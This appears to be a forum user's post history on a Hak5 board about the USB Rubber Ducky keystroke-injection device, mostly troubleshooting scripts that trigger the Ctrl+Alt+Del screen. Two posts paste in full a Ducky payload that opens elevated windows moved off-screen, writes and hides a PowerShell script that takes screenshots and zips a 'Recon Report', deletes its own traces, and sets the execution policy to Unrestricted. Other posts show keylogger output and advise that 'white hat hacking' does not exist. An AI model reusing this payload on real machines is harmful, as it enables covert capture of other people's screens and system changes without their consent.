HelloPoppit
-
Posts
7 -
Joined
-
Last visited
Posts posted by HelloPoppit
-
-
So, today, with a new problem.
EDIT: This is what KKP ( A keylogger ) logged when I hit the button to start the script
** [Ctrl][Alt][AltGr][up][End][Ctrl][Windows][Ctrl][AltGr][End][Alt][AltGr]#[Ctrl][AltGr][Alt][Ctrl][AltGr][Ctrl][AltGr][Ctrl][Windows][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows][AltGr][Alt][AltGr][PageUp][Windows]J[Ctrl][Windows][AltGr][Alt][AltGr][PageDown][Ctrl][Alt][Ctrl][AltGr]
[NumLock][Ctrl][Alt][Windows][Alt][AltGr][Alt][Windows][AltGr][MenuClick][Ctrl][Windows][Ctrl][AltGr][PageUp][Alt][Ctrl][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][scrollLock][Ctrl][Alt][Windows][AltGr][Ctrl][Alt][AltGr][Ctrl][AltGr][Alt][Windows]>[Windows][Ctrl][AltGr][MenuClick][Ctrl][Alt][Windows][MenuClick][Ctrl][Alt][AltGr][Alt][Ctrl][AltGr][PageDown][Ctrl][AltGr][F12][Windows]J[Ctrl][Alt][AltGr][F11][Ctrl][AltGr][Delete][End][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][/scrollLock][Ctrl][Alt][AltGr][Cancel][Alt][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Alt][Windows][AltGr][Ctrl]>[Ctrl][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Ctrl][Ctrl][AltGr][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows] **
That's all that was logged.
HELP! can I get a email address to hak5? Last time they just sent me here. Is there a way to contact Darren himself? It's sad when a company just sends you to a useless forum without even helping.
Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys.
**Example Script**
DELAY 3000GUI rDELAY 750STRING powershell Start-Process notepad -Verb runAsENTERDELAY 1500ALT yDELAY 500ENTERALT SPACEDELAY 100STRING mDELAY 200DOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWENTERSTRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')ENTERSTRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTimeENTERSTRING $fileSaveDir = New-Item ($userDir) -ItemType DirectoryENTERSTRING $date = get-dateENTERSTRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"ENTERSTRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'ENTERSTRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"ENTERSTRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType DirectoryENTERSTRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidthENTERSTRING $displayWidth = $displayInfo.ScreenWidthENTERSTRING $displayHeight = $displayInfo.ScreenHeightENTERSTRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing")ENTERSTRING $x = 0ENTERSTRING do { Start-Sleep -Seconds 60ENTERSTRING $jpegName = (get-date).ToString('HHmmss')ENTERSTRING $image = new-object System.Drawing.Bitmap 1366 ,768ENTERSTRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeightENTERSTRING $screen = [system.Drawing.Graphics]::FromImage($image)ENTERSTRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy))ENTERSTRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));ENTERSTRING $x++ } while ($x -ne 1);ENTERSTRING $Report >> $fileSaveDir'/ComputerInfo.html'ENTERSTRING function copy-ToZip($fileSaveDir){ENTERSTRING $srcdir = $fileSaveDirENTERSTRING $zipFile = '/public\Report.zip'ENTERSTRING if(-not (test-path($zipFile))) {ENTERSTRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))ENTERSTRING (dir $zipFile).IsReadOnly = $false}ENTERSTRING $shellApplication = new-object -com shell.applicationENTERSTRING $zipPackage = $shellApplication.NameSpace($zipFile)ENTERSTRING $files = Get-ChildItem -Path $srcdirENTERSTRING foreach($file in $files) {ENTERSTRING $zipPackage.CopyHere($file.FullName)ENTERSTRING while($zipPackage.Items().Item($file.name) -eq $null){ENTERSTRING Start-sleep -seconds 1 }}}ENTERSTRING copy-ToZip($fileSaveDir)ENTERSTRING remove-item $fileSaveDir -recurseENTERSTRING Remove-Item $MyINvocation.InvocationNameENTERCTRL SDELAY 1500STRING C:\Windows\config.ps1ENTERDELAY 2000ALT F4DELAY 200GUI rDELAY 500STRING powershell Start-Process cmd -Verb runAsENTERDELAY 1500ALT yDELAY 500STRING mode con:cols=14 lines=1ENTERALT SPACEDELAY 100STRING mDELAY 200DOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWENTERSTRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$falseENTERDELAY 1000STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1ENTER****I just don't know what to do anymore. Someone help.The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything.EDIT:: I've also tried the simple " Hello world " script, same result.ALSO:;The microSD card wont save any new data? -
So, today, with a new problem.
Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys.
**Example Script**
DELAY 3000GUI rDELAY 750STRING powershell Start-Process notepad -Verb runAsENTERDELAY 1500ALT yDELAY 500ENTERALT SPACEDELAY 100STRING mDELAY 200DOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWENTERSTRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')ENTERSTRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTimeENTERSTRING $fileSaveDir = New-Item ($userDir) -ItemType DirectoryENTERSTRING $date = get-dateENTERSTRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"ENTERSTRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'ENTERSTRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"ENTERSTRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType DirectoryENTERSTRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidthENTERSTRING $displayWidth = $displayInfo.ScreenWidthENTERSTRING $displayHeight = $displayInfo.ScreenHeightENTERSTRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing")ENTERSTRING $x = 0ENTERSTRING do { Start-Sleep -Seconds 60ENTERSTRING $jpegName = (get-date).ToString('HHmmss')ENTERSTRING $image = new-object System.Drawing.Bitmap 1366 ,768ENTERSTRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeightENTERSTRING $screen = [system.Drawing.Graphics]::FromImage($image)ENTERSTRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy))ENTERSTRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));ENTERSTRING $x++ } while ($x -ne 1);ENTERSTRING $Report >> $fileSaveDir'/ComputerInfo.html'ENTERSTRING function copy-ToZip($fileSaveDir){ENTERSTRING $srcdir = $fileSaveDirENTERSTRING $zipFile = '/public\Report.zip'ENTERSTRING if(-not (test-path($zipFile))) {ENTERSTRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))ENTERSTRING (dir $zipFile).IsReadOnly = $false}ENTERSTRING $shellApplication = new-object -com shell.applicationENTERSTRING $zipPackage = $shellApplication.NameSpace($zipFile)ENTERSTRING $files = Get-ChildItem -Path $srcdirENTERSTRING foreach($file in $files) {ENTERSTRING $zipPackage.CopyHere($file.FullName)ENTERSTRING while($zipPackage.Items().Item($file.name) -eq $null){ENTERSTRING Start-sleep -seconds 1 }}}ENTERSTRING copy-ToZip($fileSaveDir)ENTERSTRING remove-item $fileSaveDir -recurseENTERSTRING Remove-Item $MyINvocation.InvocationNameENTERCTRL SDELAY 1500STRING C:\Windows\config.ps1ENTERDELAY 2000ALT F4DELAY 200GUI rDELAY 500STRING powershell Start-Process cmd -Verb runAsENTERDELAY 1500ALT yDELAY 500STRING mode con:cols=14 lines=1ENTERALT SPACEDELAY 100STRING mDELAY 200DOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWENTERSTRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$falseENTERDELAY 1000STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1ENTER****I just don't know what to do anymore. Someone help.The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything.EDIT:: I've also tried the simple " Hello world " script, same result. -
Nopes, that wasn't the issue. Got a credit card now so the topic can be closed. haven't bought my ducky yet. I'm still figuring out how it exactly works. Got the payloader in my kali machine yet but i'm still figguring out how to make my own .bin files from a notepad in windows 8 so any help is very welcome here!
This is a old topic, but I figured I'd let you in on how to, cause it's easy.
Once you have your script, plug your microsd card into your computer through a adaptor, then go into your notepad, click ' save as ' then go into the sd card from the pop up window and type " inject.bin " it will ask you to replace the current file, click yes. Done.
-
I disagree with what most of these people said. I personally found that learning a scripting language was the most wasteful time of my life. Since you are on a hak5 forum, I suggest buying the rubber ducky. Besides that, there's nothing that you really need to buy to start " hacking " for the record, there's no such thing as " White hat hacking " it's all just black hat, just a personal opinion, you could probably go and prove me wrong though. You honestly can't know everything by reading a book. It takes time to slowly learn stuff. I do want to make sure you acknowledge this, hacking will disappoint you. It's nothing like people think it is.
I advise you buy McAfee, though. Dealing with hacking community's you will often download a virus or two, nothing to be afraid of.
Start writing windows batch files, they are fun. Also, check out this forum -( Hackforums.net )- just don't make another post like this there.
I hope this helped a little bit.
-
1) Do you know what firmware you are running?
2) What is your script?
3) What version of the Encoder
4) Have you read the FAQ / Guide
1. Whatever came on the Ducky ( purchased dec 22nd 2013 )
2 The script came from online, it was to just make a new user. But I used different scripts and they all worked.
3 what encoder? The script I wrote was from online and you just download it. Could I get a download link to the encoder?
4. Yes. I'm wondering if I did something wrong when replacing the inject.bun
-
So, I just recently got my ducky, and when I downloaded and ran a few commands I decided to make my own. After trying it, it didn't work, so I went to go and run one I had already ran ( That did work ) and now when I plug my ducky in, all it does it flash green with almost no break in-between. Help!
Can someone give me a full explanation on how to use this? And how to fix it.. Thanks
All Ducky scripts lead to 'CTRL + ALT + DEL' screen
in Classic USB Rubber Ducky
Posted
I tried that, and reformatting both of the sd cards